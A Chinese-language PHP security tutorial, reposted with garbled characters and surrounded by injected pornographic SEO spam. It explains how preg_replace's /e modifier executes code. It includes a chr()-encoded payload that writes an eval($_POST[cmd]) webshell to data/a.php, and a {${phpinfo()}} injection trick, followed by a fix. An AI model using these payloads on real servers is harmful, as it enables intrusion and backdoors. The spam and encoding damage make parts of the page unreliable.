mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

特別說(shuō)明: /e 修正符使 preg_replace() 將 replacement 參數(shù)當(dāng)作 PHP 代碼(在適當(dāng)?shù)哪嫦蛞锰鎿Q完 " /> 九九热视频精品在线,日韩精品无码一区二区三区,色欧美片视频在线观看

中文字幕日韩一区二区_国产一区二区av_国产毛片av_久久久久国产一区_色婷婷电影_国产一区二区精品

慎用preg_replace危險(xiǎn)的/e修飾符(一句話后門(mén)常用)

preg_replace函數(shù)原型:

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

特別說(shuō)明:
/e 修正符使 preg_replace() 將 replacement 參數(shù)當(dāng)作 php 代碼(在適當(dāng)?shù)哪嫦蛞锰鎿Q完之后)。提示:要確保 replacement 構(gòu)成一個(gè)合法的 php 代碼字符串,否則 php 會(huì)在報(bào)告在包含 preg_replace() 的行中出現(xiàn)語(yǔ)法解析錯(cuò)誤。
舉例:

復(fù)制代碼 代碼如下:
<?php
preg_replace ("/(</?)(w+)([^>]*>)/e",
"/1.strtoupper(/2)./3",
$html_body);
?>


這將使輸入字符串中的所有 HTML 標(biāo)記變成大寫(xiě)。

安全威脅分析:
通常subject參數(shù)是由客戶端產(chǎn)生的,客戶端可能會(huì)構(gòu)造惡意的代碼,例如:

復(fù)制代碼 代碼如下:
<?
echo preg_replace("/test/e",$_GET["h"],"jutst test");
?>


如果我們提交?h=phpinfo(),phpinfo()將會(huì)被執(zhí)行(使用/e修飾符,preg_replace會(huì)將 replacement 參數(shù)當(dāng)作 php 代碼執(zhí)行)。
如果我們提交下面的代碼會(huì)怎么樣呢?
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
密文對(duì)應(yīng)的明文是:fputs(fopen(data/a.php,w),<?php eval($_POST[cmd])?>);
執(zhí)行的結(jié)果是在/data/目錄下生成一個(gè)一句話木馬文件 a.php

再來(lái)一個(gè)有難度的例子:

復(fù)制代碼 代碼如下:
<?
function test($str)
{
}
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("/1")', $_GET["h"]);
?>


提交 ?h=[php]phpinfo()[/php],phpinfo()會(huì)被執(zhí)行嗎?
肯定不會(huì)。因?yàn)榻?jīng)過(guò)正則匹配后, replacement 參數(shù)變?yōu)?test("phpinfo")',此時(shí)phpinfo僅是被當(dāng)做一個(gè)字符串參數(shù)了。
有沒(méi)有辦法讓它執(zhí)行呢?


當(dāng)然有。在這里我們?nèi)绻峤?h=[php]{${phpinfo()}}[/php],phpinfo()就會(huì)被執(zhí)行。為什么呢?
php中,雙引號(hào)里面如果包含有變量,php解釋器會(huì)將其替換為變量解釋后的結(jié)果;單引號(hào)中的變量不會(huì)被處理。
注意:雙引號(hào)中的函數(shù)不會(huì)被執(zhí)行和替換。

在這里我們需要通過(guò){${}}構(gòu)造出了一個(gè)特殊的變量,'test("{${phpinfo()}}")',達(dá)到讓函數(shù)被執(zhí)行的效果(${phpinfo()}會(huì)被解釋執(zhí)行)。
可以先做如下測(cè)試:

復(fù)制代碼 代碼如下:
echo "{${phpinfo()}}";


phpinfo會(huì)被成功執(zhí)行了。

如何防范這種漏洞呢?
將'test("/1")' 修改為"test('/1')",這樣‘${phpinfo()}'就會(huì)被當(dāng)做一個(gè)普通的字符串處理(單引號(hào)中的變量不會(huì)被處理)。

php技術(shù)慎用preg_replace危險(xiǎn)的/e修飾符(一句話后門(mén)常用),轉(zhuǎn)載需保留來(lái)源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 亚洲精品视频免费观看 | 国产精品污污视频 | 国产日产精品一区二区三区四区 | 国产一二三视频在线观看 | 午夜三区 | 超碰最新在线 | 五月婷婷在线视频 | 欧美在线一区二区三区 | 日韩色视频 | 免费视频久久久久 | 91视频在线观看 | 精品国产精品一区二区夜夜嗨 | 日韩精品亚洲专区在线观看 | 成人三级视频在线观看 | 亚洲精品乱码久久久久久按摩观 | 亚洲欧美一区二区三区1000 | 成人免费视频 | 亚洲电影第三页 | 精品在线99| 国产精品二区三区在线观看 | 久久久精品影院 | 国产日韩一区二区 | 成人av看片| 黄色毛片在线观看 | japanhd成人| 国产一区二区三区精品久久久 | 日本在线小视频 | 亚洲国产成人一区二区 | 国产一区二区不卡 | 欧美成人影院在线 | 四虎影视 | 午夜爽爽爽男女免费观看影院 | www.黄色在线观看 | 最新国产在线 | 成人精品在线视频 | 成人小视频在线 | 色婷婷综合久久久中字幕精品久久 | 婷婷色国产偷v国产偷v小说 | 草久久久| 国产一级免费视频 | 久草资源 |